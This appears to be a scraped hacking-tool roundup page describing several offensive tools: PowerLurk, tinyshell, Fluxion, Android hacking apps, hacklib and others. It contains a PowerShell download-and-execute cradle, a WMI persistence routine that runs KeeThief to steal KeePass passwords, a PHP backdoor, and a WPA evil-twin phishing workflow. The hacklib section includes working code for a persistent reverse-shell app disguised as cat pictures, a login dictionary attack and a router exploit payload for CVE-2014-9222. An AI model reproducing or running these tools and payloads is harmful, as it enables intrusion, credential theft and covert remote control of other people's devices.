Exploit Network and Gathering Information with Nmap - Dracnmap

Dracnmap is an open source program which is using to exploit the network and gathering information with nmap help. Nmap command comes with lots of options that can make the utility more robust and difficult to follow for new users. Hence Dracnmap is designed to perform fast scaning with the utilizing script engine of nmap and nmap can perform various automatic scanning techniques with the advanced commands.

Screenshot

Getting Started

git clone https://github.com/Screetsec/Dracnmap.git
cd Dracnmap
chmod +x Dracnmap.sh
sudo ./Dracnmap.sh or sudo su ./Dracnmap.sh

Requirements

• A linux operating system. We recommend Kali Linux 2 or Kali 2016.1 rolling / Cyborg / Parrot / Dracos / BackTrack / Backbox / and another operating system ( linux )
  
• Must install nmap
  

Tutorial
you can visit my channel : https://www.youtube.com/channel/UCpK9IXzLMfVFp9NUfDzxFfw

Credits

• Thanks to allah and Screetsec [ Edo -maland- ]
• Dracos Linux from Scratch Indonesia ( Awesome Penetration os ), you can see in http://dracos-linux.org/
• Offensive Security for the awesome OS ( http://www.offensive-security.com/ )
• http://www.kali.org/ "
  
• Jack Wilder admin in http://www.linuxsec.org
• And another open sources tool in github
• Uptodate new tools hacking visit http://www.kitploit.com
• My Friends ( Boy Suganda )

Download Dracnmap

Read More

KNXnet/IP scanning and auditing tool for KNX home automation installations - KNXmap

A tool for scanning and auditing KNXnet/IP gateways on IP driven networks. KNXnet/IP defines Ethernet as physical communication media for KNX (EN 50090, ISO/IEC 14543). KNXmap also allows to scan for devices on the KNX bus via KNXnet/IP gateways. In addition to scanning, KNXmap supports other modes to interact with KNX gateways like monitor bus messages or write arbitrary values to group addresses.

Compatibility

KNXmap requires Python 3.3 or newer. There are no external dependencies, everything is included in the standard library.

Note : Users of Python 3.3 need to install the asyncio module from PyPI .

Usage
Invoke knxmap.py locally or install it:

python setup.py install

Documentation
The documentation is available in the repository wiki .

Hacking
Enable full debugging and verbosity for development:

PYTHONASYNCIODEBUG=1 knxmap.py -v scan 192.168.178.20 1.1.0-1.1.6 --bus-info

Download KNXmap

Read More

Malicious WMI Events using PowerShell - PowerLurk

PowerLurk is a PowerShell toolset for building malicious WMI Event Subsriptions. The goal is to make WMI events easier to fire off during a penetration test or red team engagement. Please see my post Creeping on Users with WMI Events: Introducing PowerLurk for more detailed information: https://pentestarmoury.com/2016/07/13/151/

To use PowerLurk, you must import the PowerLurk.ps1 module into your instance of PowerShell. This can be done a couple of ways:

Import locally

    PS> powershell.exe -NoP -Exec ByPass -C Import-Module c:\\temp\\PowerLurk.ps1   

Download Cradle

    PS> powershell.exe -NoP -C "IEX (New-Object Net.WebClient).DownloadString('http://<IP>/PowerLurk.ps1'); Get-WmiEvent"   

Get-WmiEvent
By default, Get-WmiEvent queries WMI for all __FilterToConsumerBinding instances and associated __EventFilter, and __EventConsumer instances. Objects returned can be deleted by piping to Remove-WmiObject.
Return all active WMI event objects with the name 'RedTeamEvent'

    Get-WmiEvent -Name RedTeamEvent   

Delete 'RedTeamEvent' WMI event objects

    Get-WmiEvent -Name RedTeamEvent | Remove-WmiObject   

Register-MaliciousWmiEvent
This cmdlet is the core of PowerLurk. It takes a command, script, or scriptblock as the action and a precanned trigger then creates the WMI Filter, Consumer, and FilterToConsumerBinding required for a fully functional Permanent WMI Event Subscription. A number of WMI event triggers, or filters, are preconfigured. The trigger must be specified with the -Trigger parameter. There are three consumers to choose from, PermanentCommand, PermanentScript, and LocalScriptBLock. Example usage:
Write the notepad.exe process ID to C:\temp\log.txt whenever notepad.exe starts

    Register-MaliciousWmiEvent -EventName LogNotepad -PermanentCommand “cmd.exe /c echo %ProcessId% >> c:\\temp\\log.txt” -Trigger ProcessStart -ProcessName notepad.exe   

Cleanup Malicious WMI Event

    Get-WmiEvent -Name LogNotepad | Remove-WmiObject   

Add-KeeThiefLurker
creates a permanent WMI event that will execute KeeThief (See @Harmj0y's KeeThief at https://github.com/adaptivethreat/KeeThief ) 4 minutes after the 'keepass' process starts. This gives the target time to log into their KeePass database.
The KeeThief logic and its output are either stored in a custom WMI namespace and class or regsitry values. If a custom WMI namespace and class are selected, you have the option to expose that namespace so that it can be read remotely by 'Everyone'. Registry path and value names are customizable using the associated switches; however, this is optional as defaults are set. Example usage:
Add KeeThiefLurker event using WMI class storage

    Add-KeeThiefLurker -EventName KeeThief -WMI   

Query custom WMI class

    Get-WmiObject -Namespace root\software win32_WindowsUpdate -List   

Extract KeeThief output from WMI class

    [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($(Get-WmiObject -Namespace root\software win32_WindowsUpdate -List).Properties['Output'].value))   

Cleanup KeeThiefLurker

    Remove-KeeThiefLurker -EventName KeeThief -WMI   

Download PowerLurk

Read More

A bash script for anonymizing the public IP managing the connection to TOR and different VPNs providers - 4nonimizer

What is 4nonimizer?
It is a bash script for anonymizing the public IP used to browsing Internet, managing the connection to TOR network and to different VPNs providers (OpenVPN), whether free or paid. By default, it includes several pre-configured VPN connections to different peers (.ovpn files) and download the credentials. Also, it records each used IP that we use every 300 seconds in log files.
This script is enabled as a service in systemd systems and uses a default vpn (VPNBook) at system startup.

Installation
Download the repo using git, execute the command ./4nonimizer install in the directory, and follow the screen instructions, 4nonimizer will move to the directory /opt/ and installed as a service.
This script has full compatibility with Kali Linux, although it has been properly tested and should also work on other distributions like Debian, Ubuntu and Arch (Manjaro). However there could be some bugs, or unexpected performances (please comments if you find any!).

Options
Once installed 4nonymizer, enter the command 4nonimizer help to get the help, which shows all the available parameters:

Available VPNs
Currently it supports the following VPN providers:
- HideMyAss https://www.hidemyass.com/
- TorGuard https://torguard.net/
- VPNBook (by default) http://www.vpnbook.com/
- VPNGate http://www.vpngate.net/en/
- VPNMe https://www.vpnme.me/
- VPNKeys https://www.vpnkeys.com/

Install a new VPN
To install an additional vpn we have to use the following structure in order to the 4nonimizer be able to integrate and perform operations with it.
First, we have to create the following dir structure /vpn/ within 4nonimizer path:

In our example we create the folder /vpntest/ and within it placed all .ovpn files we have. If the files ovpn not have the certificate within each of them we put in the same folder as shown in the example certificate.crt .
In addition, we must place a file named pass.txt containing 2 lines: the first one with the username and the second one with the password, as shown below:

If we have correctly performed all steps when we execute the command 4nonimizer change_provider the menu will show our vpn:

As you can see in the picture, option [7] it is the vpn we've created.

Getting credencials and ovpn files automatically
If the VPN provider allows automation of credential and/or .ovpn files getting, 4nonimizer has standardized the following scripts names and locations:
- /opt/4nonimizer/vpn/provider/ vpn-get-pass.sh

- /opt/4nonimizer/vpn/provider/ vpn-get-ovpn.sh

4nonimizer automatically detect the presence of both scripts and indicate (Auto-pass Login) or (Auto-get OVPN) if applicable.

Extras
- Execute 'source 4nonimizer' to activate autocompletation of parameters.
- Copy .conkyrc in your home directory to load a 4nonimizer template and execute conky.

References
- http://www.hackplayers.com/2016/08/tuto-enmascarar-ip-linux-vpn-tor.html
- http://www.hackplayers.com/2016/10/4nonimizer-un-script-para-anonimizar-ip.html

Versions
- 1.0-beta codename .bye-world! 5/10/2016

Download 4nonimizer

Read More

Python Client with PHP Shell - tinyshell

python Client with php shell , allows to connect and send commands over current protocol using POST and GET Requests

Features

1. connect with direct session with no need for reverse connection .
2. support password protection .
3. can be binded to any file with no damage .
4. using GET/POST request with error handling .

Usage
the project contains of two files :

1. Remote shell python file : considered as Client to connect with target python remote shell.py url password
   
2. php shell php file : considered as php backdoor . password can be edited manually by modifing the code .
   

Credits
Lawrence Amer - Vulnerability Lab Researcher .

Video

Download tinyshell

Read More

Top 10 Best Apps 2016 - Android Hacking

Do you wanna know how to turn your smartphone in hacking machine ? then you came at  right place . let’s talk about Top 10 Best Android Hacking Apps.

Obs, I'm not responsible for your act

Top 10 Best Android Hacking Apps

#1 Androrat

#AndroRat  ‘s meaning is  Android Remote Administration Tool. androrat is a remote administration tool which is used to control another device without physical access to victim’s device!

see features of Androrat

ºGet contacts (and all theirs informations)
ºGet call logs & Get all messages
ºLocation by GPS/Network
ºMonitoring received messages in live
ºMonitoring phone state in live (call received, call sent, call missed..)
ºTake a picture from the camera & Stream sound from microphone (or other sources..)
ºStreaming video (for activity based client only)
ºDo a toast & Send a text message
ºGive call & Open an URL in the default browser


Download Androrat



#2 DroidBox

DroidBox is developed to offer dynamic analysis of Android applications. The following information is described in the results, generated when analysis is complete:

features of Droidbox

ºHashes for the analyzed package
ºIncoming/outgoing network data
ºFile read and write operations
ºStarted services and loaded classes through DexClassLoader
ºInformation leaks via the network, file and SMS
ºCircumvented permissions
ºCryptographic operations performed using Android API
ºListing broadcast receivers
ºSent SMS and phone calls


Download DroidBox



#4 zANTI


zANTI is a penetration testing toolkit  developed by Zimperium Mobile Security for cyber security professionals. Basically, it allows you to simulate malicious attacks on a network. With the help of zANTI, you will be able to perform various types of operations such as MITM attacks, MAC address spoofing, scanning, password auditing, vulnerability checks and much more. In short, this android toolkit is a perfect companion of hackers.  How to use zANTI for Hacking .  this app is very professional in android hacking apps.

features of zANTI

ºuser can Change device’s MAC address.
ºthey can Create a malicious WiFi hotspot.
ºHijack HTTP sessions.
ºCapture downloads.
ºModify HTTP requests and responses.
ºExploit routers.
ºAudit passwords.
ºCheck a device for shellshock and SSL poodle vulnerability.


Download zANTI


#5 APK Inspector

APKinspector is a powerful GUI tool to analyse the Android apps , goal for this project is to aide analysts and reverse engineers to visualize compiled Android packages and their corresponding DEX code , edit remove credits license etc.


Download APK Inspector


#6 Droid Sheep

DroidSheep can use victims’ accounts, gaining access to sites that don’t use a secured and encrypted SSL connection that may make HTTPS vulnerable . DroidSheep requires root privileges. While popular sites like Yahoo, Google, and Facebook now support encrypted HTTPS connections that aren’t vulnerable to a tool like DroidSheep, there surely are hundreds of others that are.

Droidsheep apk is also a tool to hack Facebook, Twitter and many other site via your android device. Droidsheep uses the method of cookie Hijacking to hack these accounts. Droidsheep don’t reveal you the passwords and email but you can access Facebook accounts directly without them, i.e. this app provides a ink to get access to other accounts directly.this tool is beast one in the list of android hacking apps.


Download Droid Sheep



#7 Arpspoof

Arpspoof is a tool for network auditing originally written by Dug Song as a part of his dsniff package. Arpspoof  redirects traffic on the local network by forging ARP replies and sending them to either a specific target or all the hosts on the local network paths ,arpsoof in list of my favorite android hacking apps.


Download Arpspoof



#8 Nmap for Android

Nmap (network mapper) is one the best among different network scanner (port finder) tool, Nmap mainly developed for Unix OS but now it is available on Windows and Android as well. Nmap for android is a Nmap apps for your phone! Once your scan finishes you can e-mail the results. This application is not a official apps but it looks good so that was one of in android hacking apps.


Download NmapA



#9 dSploit 

dSploit is a penetration testing suite developed by Simone Margaritelli for the Android operating system. which consists of several modules that are capable to perform network security assessments on wireless networks,must read guide on


Download dSploit


#10 Wifikill

Wifi Kill Pro Hacking Tool

WiFiKill  is an android tool that you can use to disable internet connection for a device on constant WiFi network. It is a light-weight tool with simple interface , you can kick any user in same wifi network which means you can prevent your neighbors to using your wifi connection using wifikill


Download Wifi Kill Pro


By OffSec

Read More

Transparent Proxy through TOR, I2P, Privoxy, Polipo and modify DNS - anonym8

Transparent Proxy through TOR, I2P, Privoxy, Polipo and modify DNS, for a simple and better privacy and security; Include Anonymizing Relay Monitor (arm), macchanger, hostname and wipe (Cleans ram/cache & swap-space) features. Tested on Debian, Kali, Parrot to use the graphical interface, you'll need to install separately GTKdialog and libvte.so.9 and i2p

Script requirements are:

• Tor        
• macchanger 
• resolvconf 
• dnsmasq    
• polipo     
• privoxy           
• arm        
• libnotify  
• curl
• bleachbit

they'll be automatically installed.
Open a root terminal and type:

cd anonym8_directory I.Ex: cd /home/toto/Desktop/anonym8-master
chmod +x INSTALL.sh
bash INSTALL.sh

you're done!

For more security, use Firefox!
here's some useful Firefox add on:
profil manager => https://ftp.mozilla.org/pub/utilities/profilemanager/1.0/
random agent spoofer => https://addons.mozilla.org/en-US/firefox/addon/random-agent-spoofer/  
no script => https://addons.mozilla.org/en-US/firefox/addon/noscript/
ublock origin => https://addons.mozilla.org/en-US/firefox/addon/ublock-origin/
HTTPS everywhere => https://addons.mozilla.org/fr/firefox/addon/https-everywhere/  

Reboot your system and enjoy!

@HiroshimanRise
#anonym8 (Privacy Friend)

Download anonym8

Read More

WPA/WPA2 Security Hacked Without Brute Force - Fluxion

Fluxion is a remake of linset by vk496 with less bugs and more features. It's compatible with the latest release of Kali (Rolling). Latest builds (stable) and (beta) HERE . If you new, please start reading the wiki

Fluxion GUI

How it works

• Scan the networks.
• Capture a handshake (can't be used without a valid handshake, it's necessary to verify the password)
• Use WEB Interface *
• Launch a FakeAP instance to imitate the original access point
• Spawns a MDK3 process, which deauthenticates all users connected to the target network, so they can be lured to connect to the FakeAP and enter the WPA password.
• A fake DNS server is launched in order to capture all DNS requests and redirect them to the host running the script
• A captive portal is launched in order to serve a page, which prompts the user to enter their WPA password
• Each submitted password is verified by the handshake captured earlier
• The attack will automatically terminate, as soon as a correct password is submitted

Requirements
A linux operating system. We recommend Kali Linux 2 or Kali 2016.1 rolling. Kali 2 & 2016 support the latest aircrack-ng versions. A external wifi card is recommended.

Credits

1. Deltax @FLuX and Fluxion main developer
2. Strasharo @Fluxion help to fix DHCPD and pyrit problems, spelling mistakes
3. vk496 @Linset main developer of linset
4. ApatheticEuphoria @WPS-SLAUGHTER,Bruteforce Script,Help with Fluxion
5. Derv82 @Wifite/2
6. Princeofguilty @webpages
7. Photos for wiki @ http://www.kalitutorials.net

Useful links

1. wifislax
2. kali
3. linset
4. ares

Download Fluxion

Read More

Console Web Vulnerability Scan Tools - Syhunt ScanTools

Syhunt released the new generation of its console-based scan tools, simply called ScanTools. The first release of ScanTools comes with four console applications: - ScanURL,ScanCode, ScanLog and ScanConf, incorporating the functionality of the scanners Syhunt Hybrid/Dynamic, Syhunt Code, Syhunt Insight and Syhunt Harden respectively. Whether you want to scan a live web application, source code files, web server logs or configuration files for vulnerabilities, weaknesses and more, ScanTools can help you start the task with a single line command. Syhunt ScanTools is available for download as a freeware portable package or as part of Syhunt Community.

Installation

Download Information

Syhunt ScanTools is included with the latest release of Syhunt. It is located in the installation directory of the suite.

Please note that the full-featured version of the tools is only available for registered users.

System Requirements

1. 512 MB of memory
2. 200 MB of free disk space
3. Internet connection (optional for remote scanning)
4. Windows XP, 2003, 2008, Vista, 7, 8 or 10.

Usage

Just run any of the Scan*.exe apps, which are located in the installation directory of Syhunt Hybrid, with no parameters to see usage instructions.

Supported Hunt Methods

For detailed information about scan methods, see the Hunt Methods page.

Scanning IPv6 addresses

Scanurl fully supports the scanning of IPv6 addresses. To scan an IPv6 target, enclose the address in square brackets, eg:

Scanurl http://[2001:4860:0:2001::68]

Black Box (Dynamic Scan)

1. Go to the directory Syhunt Hybrid is installed using the command prompt.
2. Use the following command-line:

 Scanurl [starturl] -hm:[a huntmethod]] -gr

 Example:
 Scanurl http://www.somehost.com -hm:appscan -gr

White Box (Source Code Scan)

1. Go to the directory Syhunt is installed using the command prompt.
2. Example command-line:

 Scancode C:\WWW\Docs\ -gr

Gray Box (Dynamic + Code Scan)

1. Go to the directory Syhunt Hybrid is installed using the command prompt.
2. Use the following command-line:

 Scanurl [starturl] -hm:[a huntmethod]] -srcdir:"[SourceDir]" -gr

 Example:
 Scanurl localhost -hm:appscan -srcdir:"C:\WWW\Docs\" -gr

Note: if you already entered the source code directory for the target host using the Syhunt Hybrid GUI in a past scan it is not necessary to assign it again using the -srcdir command.

Download  Syhunt ScanTools

Read More

Pentesting, Port Scanning, and Logging in anywhere with Python - hacklib

Toolkit for hacking enthusiasts using Python.
hacklib is a Python module for hacking enthusiasts interested in network security. It is currently in active development.

Installation
To get hacklib, simply run in command line:

pip install hacklib

hacklib also has a user interface. To use it, you can do one of the following:
Download hacklib.py and run in console:

python hacklib.py
----------------------------------------------
Hey. What can I do you for?


Enter the number corresponding to your choice.

1) Connect to a proxy
2) Target an IP or URL
3) Lan Scan
4) Create Backdoor
5) Server
6) Exit

Or if you got it using pip:

import hacklib
hacklib.userInterface()

Dependencies
Not all classes have external dependencies, but just in case you can do the following:

hacklib.installDependencies()

Usage Examples
Reverse shell backdooring (Currently only for Macs):

import hacklib

bd = hacklib.Backdoor()
# Generates an app that, when ran, drops a persistent reverse shell into the system.
bd.create('127.0.0.1', 9090, 'OSX', 'Funny_Cat_Pictures')
# Takes the IP and port of the command server, the OS of the target, and the name of the .app

Generated App:
Listen for connections with Server:

>>> import hacklib
>>> s = hacklib.Server(9090) # Bind server to port 9090
>>> s.listen() 
New connection ('127.0.0.1', 50011) # Target ran the app (connection retried every 60 seconds)
bash: no job control in this shell
bash$ whoami # Type a command
leon
bash$ # Nice!

Universal login client for almost all HTTP/HTTPS form-based logins and HTTP Basic Authentication logins:

import hacklib

ac = hacklib.AuthClient()
# Logging into a gmail account
htmldata = ac.login('https://gmail.com', 'email', 'password')

# Check for a string in the resulting page
if 'Inbox' in htmldata: print 'Login Success.'
else: print 'Login Failed.'

# For logins using HTTP Basic Auth:
try: 
    htmldata = ac.login('http://somewebsite.com', 'admin', 'password')
except: pass #login failed

Simple dictionary attack using AuthClient:

import hacklib

ac = hacklib.AuthClient()
# Get the top 100 most common passwords
passwords = hacklib.topPasswords(100)

for p in passwords:
    htmldata = ac.login('http://yourwebsite.com/login', 'admin', p)
    if htmldata and 'welcome' in htmldata.lower():
        print 'Password is', p
        break

Port Scanning:

from hacklib import *

ps = PortScanner()
ps.scan(getIP('yourwebsite.com'))
# By default scans the first 1024 ports. Use ps.scan(IP, port_range=(n1, n2), timeout=i) to change default

# After a scan, open ports are saved within ps for reference
if ps.portOpen(80):
    # Establish a TCP stream and sends a message
    send(getIP('yourwebsite.com'), 80, message='GET HTTP/1.1 \r\n')

Misfortune Cookie Exploit (CVE-2014-9222) using PortScanner:

>>> import hacklib

# Discovery
>>> ps = hacklib.PortScanner()
>>> ps.scan('192.168.1.1', (80, 81))
Port 80:
HTTP/1.1 200
Content-Type: text/html
Transfer-Encoding: chunked
Server: RomPager/4.07 UPnP/1.0
EXT:
# The banner for port 80 shows us that the server uses RomPager 4.07. This version is exploitable.

# Exploitation
>>> payload = '''GET /HTTP/1.1
Host: 192.168.1.1
User-Agent: googlebot
Accept: text/html, application/xhtml+xml, application/xml; q=09, */*; q=0.8
Accept-Language: en-US, en; q=0.5
Accept-Encoding: gzip, deflate
Cookie: C107351277=BBBBBBBBBBBBBBBBBBBB\x00''' + '\r\n\r\n'
>>> hacklib.send('192.168.1.1', 80, payload)
# The cookie replaced the firmware's memory allocation for web authentication with a null bye.
# The router's admin page is now fully accessible from any web browser.

FTP authentication:

import hacklib
ftp = hacklib.FTPAuth('127.0.0.1', 21)
try:
    ftp.login('username', 'password')
except:
    print 'Login failed.'

Socks4/5 proxy scraping and tunneling:

>>> import hacklib
>>> import urllib2
>>> proxylist = hacklib.getProxies() # scrape recently added socks proxies from the internet
>>> proxy = hacklib.Proxy()
>>> proxy.connect(proxylist) # automatically find and connect to a working proxy in proxylist
>>> proxy.IP
u'41.203.214.58'
>>> proxy.port
65000
>>> proxy.country
u'KE'
# All Python network activity across all modules are routed through the proxy:
>>> urllib2.urlopen('http://icanhazip.com/').read() 
'41.203.214.58\n'
# Notes: Only network activity via Python are masked by the proxy.
# Network activity on other programs such as your webbrowser remain unmasked.
# To filter proxies by country and type:
# proxylist = hacklib.getProxies(country_filter = ('RU', 'CA', 'SE'), proxy_type='Socks5')

Word Mangling:

from hacklib import *

word = Mangle("Test", 0, 10, 1990, 2016)

word.Leet()
word.Numbers()
word.Years()

Output:

T3$t
Test0
0Test
...snip...
Test10
10Test
Test1990
1990Test
...snip...
Test2016
2016Test

Pattern Create:

from hacklib import *

Pattern = PatternCreate(100)

Pattern.generate()

Output:

Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2A

Pattern Offset:

from hacklib import *

Offset = PatternOffset("6Ab7")

Offset.find()

Output:

[+] Offset: 50

Download python-hacklib

Read More